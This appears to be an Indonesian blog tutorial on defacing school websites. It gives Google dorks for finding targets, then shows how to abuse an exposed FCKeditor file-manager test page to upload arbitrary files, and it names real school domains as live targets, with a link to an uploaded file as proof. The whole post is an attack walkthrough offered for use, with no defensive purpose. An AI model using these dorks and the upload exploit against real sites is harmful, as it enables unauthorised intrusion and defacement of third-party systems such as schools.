- Step one:
siapin dulu perlatanya !! file .txt dari notepad (isinya terserah anda
mau nama pacar nenek ibu kaka terserah) nama sya juga boleh ! hahaha
udah buat file kan ? yowes lanjutt !
- Step two:
buka google dulu ! terus masukin Dork (kata kunci) nih sya udah siapin Dork tinggal pilih aja :
inurl:/html/siswa.php?
inurl:/html/alumni.php?
inurl:/html/guru.php?
setelah ngetik Dork tersebut kan ada banyak web sekolah tuh ? kita tinggal pilih aja wkkakka nih sya ada Live Target : http://www.sman1kotabaru.sch.id
- Step Three:
siapin Exploit dulu , tenang aja sya udah punya exploitnya nih :
Exploit: /editor/filemanager/connectors/test.html
langsung saja di hajar ! masukin exploit tadi ke url web sch.id ex : http://smkn1kuta.sch.id/editor/filemanager/connectors/test.html
nah, udah muncul kan yang mau di panggang ! pada kolom Connector *ASP
ubah menjadi *PHP terus kolom Resource Type ubah jadi *FILE lalu klik
Browse (cari file .txt yang kamu buat tadi) > Upload
- Step four:
setelah berhasil di upload , buka aja hasilnya :
http://sitetarget.sch.id/userfiles/namafileS0bat.txt atau http://sitetarget.sch.id/userfiles/file/namafileS0bat.txt
mudah kan Bro ? & ini contoh-nya : http://www.sman1kotabaru.sch.id/userfiles/file/DevilHacker.txt
Thansk To Spider Defacer Team
1 comments:
Click here for commentssob exploitnya dapet dari mana ?
ConversionConversion EmoticonEmoticon